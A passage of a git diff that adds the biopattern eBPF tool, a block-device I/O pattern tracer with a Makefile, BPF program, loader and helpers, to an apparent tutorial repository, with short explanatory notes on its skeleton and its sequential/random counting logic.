a/17-biopattern/.gitignore b/17-biopattern/.gitignore new file mode 100644 index 0000000..f79e42b --- /dev/null +++ b/17-biopattern/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +biopattern diff --git a/17-biopattern/Makefile b/17-biopattern/Makefile new file mode 100644 index 0000000..9171a00 --- /dev/null +++ b/17-biopattern/Makefile @@ -0,0 +1,145 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = biopattern # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. 
We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +trace_helpers.o: trace_helpers.c trace_helpers.h + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $< -o $@ + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) trace_helpers.o | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/17-biopattern/biopattern.bpf.c b/17-biopattern/biopattern.bpf.c new file mode 100644 index 0000000..c7d306e --- /dev/null +++ b/17-biopattern/biopattern.bpf.c 
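
The `GEN-SKEL` rule in the Makefile above runs `bpftool gen skeleton` on the compiled BPF object. For orientation, the generated `biopattern.skel.h` roughly exposes the structure sketched below (an illustrative assumption — the real header is generated at build time and also declares `biopattern_bpf__open()`, `__load()`, `__attach()` and `__destroy()`):

```c
/* Rough shape of the generated biopattern.skel.h (illustrative assumption). */
#include <stdbool.h>

struct bpf_object;            /* opaque libbpf types */
struct bpf_object_skeleton;
struct bpf_map;
struct bpf_program;
struct bpf_link;

struct biopattern_bpf {
	struct bpf_object_skeleton *skeleton;
	struct bpf_object *obj;
	struct {
		struct bpf_map *counters;
		struct bpf_map *rodata;
	} maps;
	struct {
		struct bpf_program *handle__block_rq_complete;
	} progs;
	struct {
		struct bpf_link *handle__block_rq_complete;
	} links;
	struct biopattern_bpf__rodata {
		bool filter_dev;
		unsigned int targ_dev;
	} *rodata;
};
```

This is why the user-space loader can set `obj->rodata->filter_dev` before `biopattern_bpf__load()` and hand `obj->maps.counters` to its printing routine afterwards.
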
@@ -0,0 +1,57 @@ +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; diff --git a/17-biopattern/biopattern.c b/17-biopattern/biopattern.c new file mode 100644 index 0000000..d9e9abf --- /dev/null +++ b/17-biopattern/biopattern.c @@ -0,0 +1,239 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Wenbo Zhang +// +// Based on biopattern(8) from BPF-Perf-Tools-Book by Brendan Gregg. +// 17-Jun-2020 Wenbo Zhang Created this. 
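
Before walking through the user-space loader, it may help to see the sequential/random heuristic of `handle__block_rq_complete()` in isolation: a completion counts as sequential when it starts exactly where the previous one ended, and `last_sector` is advanced by `nr_sector` after every event. The snippet below mirrors that accounting in plain C (illustrative only; the 512-byte sector size follows the `nr_sector * 512` expression in the BPF program):

```c
#include <stdint.h>
#include <stdio.h>

/* Host-side mirror of the per-device counter kept in the BPF hash map. */
struct counter { uint64_t last_sector, bytes; uint32_t sequential, random; };

static void account(struct counter *c, uint64_t sector, uint32_t nr_sector)
{
	if (c->last_sector) {
		if (c->last_sector == sector)
			c->sequential++;
		else
			c->random++;
		c->bytes += nr_sector * 512ULL;
	}
	c->last_sector = sector + nr_sector;   /* next expected sector */
}

int main(void)
{
	struct counter c = {0};
	account(&c, 1000, 8);   /* first event only primes last_sector */
	account(&c, 1008, 8);   /* contiguous -> sequential */
	account(&c, 4096, 8);   /* jump -> random */
	printf("seq=%u rnd=%u bytes=%llu\n", c.sequential, c.random,
	       (unsigned long long)c.bytes);
	return 0;
}
```
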
+#include +#include +#include +#include +#include +#include +#include +#include "biopattern.h" +#include "biopattern.skel.h" +#include "trace_helpers.h" + +static struct env { + char *disk; + time_t interval; + bool timestamp; + bool verbose; + int times; +} env = { + .interval = 99999999, + .times = 99999999, +}; + +static volatile bool exiting; + +const char *argp_program_version = "biopattern 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; +const char argp_program_doc[] = +"Show block device I/O pattern.\n" +"\n" +"USAGE: biopattern [--help] [-T] [-d DISK] [interval] [count]\n" +"\n" +"EXAMPLES:\n" +" biopattern # show block I/O pattern\n" +" biopattern 1 10 # print 1 second summaries, 10 times\n" +" biopattern -T 1 # 1s summaries with timestamps\n" +" biopattern -d sdc # trace sdc only\n"; + +static const struct argp_option opts[] = { + { "timestamp", 'T', NULL, 0, "Include timestamp on output" }, + { "disk", 'd', "DISK", 0, "Trace this disk only" }, + { "verbose", 'v', NULL, 0, "Verbose debug output" }, + { NULL, 'h', NULL, OPTION_HIDDEN, "Show the full help" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + static int pos_args; + + switch (key) { + case 'h': + argp_state_help(state, stderr, ARGP_HELP_STD_HELP); + break; + case 'v': + env.verbose = true; + break; + case 'd': + env.disk = arg; + if (strlen(arg) + 1 > DISK_NAME_LEN) { + fprintf(stderr, "invaild disk name: too long\n"); + argp_usage(state); + } + break; + case 'T': + env.timestamp = true; + break; + case ARGP_KEY_ARG: + errno = 0; + if (pos_args == 0) { + env.interval = strtol(arg, NULL, 10); + if (errno) { + fprintf(stderr, "invalid internal\n"); + argp_usage(state); + } + } else if (pos_args == 1) { + env.times = strtol(arg, NULL, 10); + if (errno) { + fprintf(stderr, "invalid times\n"); + argp_usage(state); + } + } else { + fprintf(stderr, + "unrecognized positional argument: %s\n", arg); + argp_usage(state); + } + pos_args++; + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && !env.verbose) + return 0; + return vfprintf(stderr, format, args); +} + +static void sig_handler(int sig) +{ + exiting = true; +} + +static int print_map(struct bpf_map *counters, struct partitions *partitions) +{ + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? 
partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; +} + +int main(int argc, char **argv) +{ + LIBBPF_OPTS(bpf_object_open_opts, open_opts); + struct partitions *partitions = NULL; + const struct partition *partition; + static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, + }; + struct biopattern_bpf *obj; + int err; + + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + return err; + + libbpf_set_print(libbpf_print_fn); + + obj = biopattern_bpf__open_opts(&open_opts); + if (!obj) { + fprintf(stderr, "failed to open BPF object\n"); + return 1; + } + + partitions = partitions__load(); + if (!partitions) { + fprintf(stderr, "failed to load partitions info\n"); + goto cleanup; + } + + /* initialize global data (filtering options) */ + if (env.disk) { + partition = partitions__get_by_name(partitions, env.disk); + if (!partition) { + fprintf(stderr, "invaild partition name: not exist\n"); + goto cleanup; + } + obj->rodata->filter_dev = true; + obj->rodata->targ_dev = partition->dev; + } + + err = biopattern_bpf__load(obj); + if (err) { + fprintf(stderr, "failed to load BPF object: %d\n", err); + goto cleanup; + } + + err = biopattern_bpf__attach(obj); + if (err) { + fprintf(stderr, "failed to attach BPF programs\n"); + goto cleanup; + } + + signal(SIGINT, sig_handler); + + printf("Tracing block device I/O requested seeks... Hit Ctrl-C to " + "end.\n"); + if (env.timestamp) + printf("%-9s ", "TIME"); + printf("%-7s %5s %5s %8s %10s\n", "DISK", "%RND", "%SEQ", + "COUNT", "KBYTES"); + + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } + +cleanup: + biopattern_bpf__destroy(obj); + partitions__free(partitions); + + return err != 0; +} diff --git a/17-biopattern/biopattern.h b/17-biopattern/biopattern.h new file mode 100644 index 0000000..18860a5 --- /dev/null +++ b/17-biopattern/biopattern.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +#ifndef __BIOPATTERN_H +#define __BIOPATTERN_H + +#define DISK_NAME_LEN 32 + +struct counter { + __u64 last_sector; + __u64 bytes; + __u32 sequential; + __u32 random; +}; + +#endif /* __BIOPATTERN_H */ diff --git a/17-biopattern/core_fixes.bpf.h b/17-biopattern/core_fixes.bpf.h new file mode 100644 index 0000000..552c9fa --- /dev/null +++ b/17-biopattern/core_fixes.bpf.h @@ -0,0 +1,169 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2021 Hengqi Chen */ + +#ifndef __CORE_FIXES_BPF_H +#define __CORE_FIXES_BPF_H + +#include +#include + +/** + * commit 2f064a59a1 ("sched: Change task_struct::state") changes + * the name of task_struct::state to task_struct::__state + * see: + * https://github.com/torvalds/linux/commit/2f064a59a1 + */ +struct task_struct___o { + volatile long int state; +} __attribute__((preserve_access_index)); + +struct task_struct___x { + unsigned int __state; +} __attribute__((preserve_access_index)); + +static __always_inline __s64 get_task_state(void *task) +{ + struct task_struct___x *t = task; + + if (bpf_core_field_exists(t->__state)) + return 
BPF_CORE_READ(t, __state); + return BPF_CORE_READ((struct task_struct___o *)task, state); +} + +/** + * commit 309dca309fc3 ("block: store a block_device pointer in struct bio") + * adds a new member bi_bdev which is a pointer to struct block_device + * see: + * https://github.com/torvalds/linux/commit/309dca309fc3 + */ +struct bio___o { + struct gendisk *bi_disk; +} __attribute__((preserve_access_index)); + +struct bio___x { + struct block_device *bi_bdev; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_gendisk(void *bio) +{ + struct bio___x *b = bio; + + if (bpf_core_field_exists(b->bi_bdev)) + return BPF_CORE_READ(b, bi_bdev, bd_disk); + return BPF_CORE_READ((struct bio___o *)bio, bi_disk); +} + +/** + * commit d5869fdc189f ("block: introduce block_rq_error tracepoint") + * adds a new tracepoint block_rq_error and it shares the same arguments + * with tracepoint block_rq_complete. As a result, the kernel BTF now has + * a `struct trace_event_raw_block_rq_completion` instead of + * `struct trace_event_raw_block_rq_complete`. + * see: + * https://github.com/torvalds/linux/commit/d5869fdc189f + */ +struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_block_rq_completion() +{ + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; +} + +/** + * commit d152c682f03c ("block: add an explicit ->disk backpointer to the + * request_queue") and commit f3fa33acca9f ("block: remove the ->rq_disk + * field in struct request") make some changes to `struct request` and + * `struct request_queue`. Now, to get the `struct gendisk *` field in a CO-RE + * way, we need both `struct request` and `struct request_queue`. + * see: + * https://github.com/torvalds/linux/commit/d152c682f03c + * https://github.com/torvalds/linux/commit/f3fa33acca9f + */ +struct request_queue___x { + struct gendisk *disk; +} __attribute__((preserve_access_index)); + +struct request___x { + struct request_queue___x *q; + struct gendisk *rq_disk; +} __attribute__((preserve_access_index)); + +static __always_inline struct gendisk *get_disk(void *request) +{ + struct request___x *r = request; + + if (bpf_core_field_exists(r->rq_disk)) + return BPF_CORE_READ(r, rq_disk); + return BPF_CORE_READ(r, q, disk); +} + +/** + * commit 6521f8917082("namei: prepare for idmapped mounts") add `struct + * user_namespace *mnt_userns` as vfs_create() and vfs_unlink() first argument. + * At the same time, struct renamedata {} add `struct user_namespace + * *old_mnt_userns` item. Now, to kprobe vfs_create()/vfs_unlink() in a CO-RE + * way, determine whether there is a `old_mnt_userns` field for `struct + * renamedata` to decide which input parameter of the vfs_create() to use as + * `dentry`. 
+ * see: + * https://github.com/torvalds/linux/commit/6521f8917082 + */ +struct renamedata___x { + struct user_namespace *old_mnt_userns; +} __attribute__((preserve_access_index)); + +static __always_inline bool renamedata_has_old_mnt_userns_field(void) +{ + if (bpf_core_field_exists(struct renamedata___x, old_mnt_userns)) + return true; + return false; +} + +/** + * commit 3544de8ee6e4("mm, tracing: record slab name for kmem_cache_free()") + * replaces `trace_event_raw_kmem_free` with `trace_event_raw_kfree` and adds + * `tracepoint_kmem_cache_free` to enhance the information recorded for + * `kmem_cache_free`. + * see: + * https://github.com/torvalds/linux/commit/3544de8ee6e4 + */ + +struct trace_event_raw_kmem_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kfree___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +struct trace_event_raw_kmem_cache_free___x { + const void *ptr; +} __attribute__((preserve_access_index)); + +static __always_inline bool has_kfree() +{ + if (bpf_core_type_exists(struct trace_event_raw_kfree___x)) + return true; + return false; +} + +static __always_inline bool has_kmem_cache_free() +{ + if (bpf_core_type_exists(struct trace_event_raw_kmem_cache_free___x)) + return true; + return false; +} + +#endif /* __CORE_FIXES_BPF_H */ diff --git a/17-biopattern/index.html b/17-biopattern/index.html index df214d3..364e57e 100644 --- a/17-biopattern/index.html +++ b/17-biopattern/index.html @@ -83,7 +83,7 @@ diff --git a/17-biopattern/maps.bpf.h b/17-biopattern/maps.bpf.h new file mode 100644 index 0000000..51d1012 --- /dev/null +++ b/17-biopattern/maps.bpf.h @@ -0,0 +1,26 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Anton Protopopov +#ifndef __MAPS_BPF_H +#define __MAPS_BPF_H + +#include +#include + +static __always_inline void * +bpf_map_lookup_or_try_init(void *map, const void *key, const void *init) +{ + void *val; + long err; + + val = bpf_map_lookup_elem(map, key); + if (val) + return val; + + err = bpf_map_update_elem(map, key, init, BPF_NOEXIST); + if (err && err != -EEXIST) + return 0; + + return bpf_map_lookup_elem(map, key); +} + +#endif /* __MAPS_BPF_H */ diff --git a/17-biopattern/trace_helpers.c b/17-biopattern/trace_helpers.c new file mode 100644 index 0000000..e873d35 --- /dev/null +++ b/17-biopattern/trace_helpers.c @@ -0,0 +1,452 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +// Copyright (c) 2020 Wenbo Zhang +// +// Based on ksyms improvements from Andrii Nakryiko, add more helpers. +// 28-Feb-2020 Wenbo Zhang Created this. +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "trace_helpers.h" + +#define min(x, y) ({ \ + typeof(x) _min1 = (x); \ + typeof(y) _min2 = (y); \ + (void) (&_min1 == &_min2); \ + _min1 < _min2 ? 
_min1 : _min2; }) + +#define DISK_NAME_LEN 32 + +#define MINORBITS 20 +#define MINORMASK ((1U << MINORBITS) - 1) + +#define MKDEV(ma, mi) (((ma) << MINORBITS) | (mi)) + +struct ksyms { + struct ksym *syms; + int syms_sz; + int syms_cap; + char *strs; + int strs_sz; + int strs_cap; +}; + +struct partitions { + struct partition *items; + int sz; +}; + +static int partitions__add_partition(struct partitions *partitions, + const char *name, unsigned int dev) +{ + struct partition *partition; + void *tmp; + + tmp = realloc(partitions->items, (partitions->sz + 1) * + sizeof(*partitions->items)); + if (!tmp) + return -1; + partitions->items = tmp; + partition = &partitions->items[partitions->sz]; + partition->name = strdup(name); + partition->dev = dev; + partitions->sz++; + + return 0; +} + +struct partitions *partitions__load(void) +{ + char part_name[DISK_NAME_LEN]; + unsigned int devmaj, devmin; + unsigned long long nop; + struct partitions *partitions; + char buf[64]; + FILE *f; + + f = fopen("/proc/partitions", "r"); + if (!f) + return NULL; + + partitions = calloc(1, sizeof(*partitions)); + if (!partitions) + goto err_out; + + while (fgets(buf, sizeof(buf), f) != NULL) { + /* skip heading */ + if (buf[0] != ' ' || buf[0] == '\n') + continue; + if (sscanf(buf, "%u %u %llu %s", &devmaj, &devmin, &nop, + part_name) != 4) + goto err_out; + if (partitions__add_partition(partitions, part_name, + MKDEV(devmaj, devmin))) + goto err_out; + } + + fclose(f); + return partitions; + +err_out: + partitions__free(partitions); + fclose(f); + return NULL; +} + +void partitions__free(struct partitions *partitions) +{ + int i; + + if (!partitions) + return; + + for (i = 0; i < partitions->sz; i++) + free(partitions->items[i].name); + free(partitions->items); + free(partitions); +} + +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (partitions->items[i].dev == dev) + return &partitions->items[i]; + } + + return NULL; +} + +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name) +{ + int i; + + for (i = 0; i < partitions->sz; i++) { + if (strcmp(partitions->items[i].name, name) == 0) + return &partitions->items[i]; + } + + return NULL; +} + +static void print_stars(unsigned int val, unsigned int val_max, int width) +{ + int num_stars, num_spaces, i; + bool need_plus; + + num_stars = min(val, val_max) * width / val_max; + num_spaces = width - num_stars; + need_plus = val > val_max; + + for (i = 0; i < num_stars; i++) + printf("*"); + for (i = 0; i < num_spaces; i++) + printf(" "); + if (need_plus) + printf("+"); +} + +void print_log2_hist(unsigned int *vals, int vals_size, const char *val_type) +{ + int stars_max = 40, idx_max = -1; + unsigned int val, val_max = 0; + unsigned long long low, high; + int stars, width, i; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) + idx_max = i; + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf("%*s%-*s : count distribution\n", idx_max <= 32 ? 5 : 15, "", + idx_max <= 32 ? 19 : 29, val_type); + + if (idx_max <= 32) + stars = stars_max; + else + stars = stars_max / 2; + + for (i = 0; i <= idx_max; i++) { + low = (1ULL << (i + 1)) >> 1; + high = (1ULL << (i + 1)) - 1; + if (low == high) + low -= 1; + val = vals[i]; + width = idx_max <= 32 ? 
10 : 20; + printf("%*lld -> %-*lld : %-8d |", width, low, width, high, val); + print_stars(val, val_max, stars); + printf("|\n"); + } +} + +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type) +{ + int i, stars_max = 40, idx_min = -1, idx_max = -1; + unsigned int val, val_max = 0; + + for (i = 0; i < vals_size; i++) { + val = vals[i]; + if (val > 0) { + idx_max = i; + if (idx_min < 0) + idx_min = i; + } + if (val > val_max) + val_max = val; + } + + if (idx_max < 0) + return; + + printf(" %-13s : count distribution\n", val_type); + for (i = idx_min; i <= idx_max; i++) { + val = vals[i]; + if (!val) + continue; + printf(" %-10d : %-8d |", base + i * step, val); + print_stars(val, val_max, stars_max); + printf("|\n"); + } +} + +unsigned long long get_ktime_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC, &ts); + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +bool is_kernel_module(const char *name) +{ + bool found = false; + char buf[64]; + FILE *f; + + f = fopen("/proc/modules", "r"); + if (!f) + return false; + + while (fgets(buf, sizeof(buf), f) != NULL) { + if (sscanf(buf, "%s %*s\n", buf) != 1) + break; + if (!strcmp(buf, name)) { + found = true; + break; + } + } + + fclose(f); + return found; +} + +static bool fentry_try_attach(int id) +{ + int prog_fd, attach_fd; + char error[4096]; + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + LIBBPF_OPTS(bpf_prog_load_opts, opts, + .expected_attach_type = BPF_TRACE_FENTRY, + .attach_btf_id = id, + .log_buf = error, + .log_size = sizeof(error), + ); + + prog_fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, "test", "GPL", insns, + sizeof(insns) / sizeof(struct bpf_insn), &opts); + if (prog_fd < 0) + return false; + + attach_fd = bpf_raw_tracepoint_open(NULL, prog_fd); + if (attach_fd >= 0) + close(attach_fd); + + close(prog_fd); + return attach_fd >= 0; +} + +bool fentry_can_attach(const char *name, const char *mod) +{ + struct btf *btf, *vmlinux_btf, *module_btf = NULL; + int err, id; + + vmlinux_btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(vmlinux_btf); + if (err) + return false; + + btf = vmlinux_btf; + + if (mod) { + module_btf = btf__load_module_btf(mod, vmlinux_btf); + err = libbpf_get_error(module_btf); + if (!err) + btf = module_btf; + } + + id = btf__find_by_name_kind(btf, name, BTF_KIND_FUNC); + + btf__free(module_btf); + btf__free(vmlinux_btf); + return id > 0 && fentry_try_attach(id); +} + +bool kprobe_exists(const char *name) +{ + char addr_range[256]; + char sym_name[256]; + FILE *f; + int ret; + + f = fopen("/sys/kernel/debug/kprobes/blacklist", "r"); + if (!f) + goto avail_filter; + + while (true) { + ret = fscanf(f, "%s %s%*[^\n]\n", addr_range, sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 2) { + fprintf(stderr, "failed to read symbol from kprobe blacklist\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return false; + } + } + fclose(f); + +avail_filter: + f = fopen("/sys/kernel/debug/tracing/available_filter_functions", "r"); + if (!f) + goto slow_path; + + while (true) { + ret = fscanf(f, "%s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from available_filter_functions\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; + +slow_path: + f = fopen("/proc/kallsyms", "r"); + 
